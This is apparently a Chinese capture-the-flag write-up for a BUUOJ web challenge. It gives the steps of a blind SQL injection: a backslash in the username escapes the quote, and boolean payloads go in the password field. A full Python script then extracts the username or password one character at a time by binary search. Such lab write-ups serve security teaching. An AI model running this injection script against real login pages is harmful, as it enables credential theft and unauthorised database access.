解题

访问robots.txt

访问hint.txt

username处可以用\来转义单引号，password处使用sql语句整数型注入。

传入admin\和or/**/length(database())>0#会回显stronger字样
传入admin\和or/**/length(database())<0#会回显girl friend字样

直接用脚本

import requests

url = "http://eeeed83e-4ab8-4328-adbd-e4caf8d13b84.node3.buuoj.cn/index.php"

data = {"username": "admin\\", "password": ""}
result = ""
i = 0

while (True):
    i = i + 1
    head = 32
    tail = 127

    while (head < tail):
        mid = (head + tail) >> 1

        payload = "or/**/if(ascii(substr(username,%d,1))>%d,1,0)#"%(i,mid)
        # payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)

        data['password'] = payload
        r = requests.post(url, data=data)

        if "stronger" in r.text:
            head = mid + 1
        else:
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)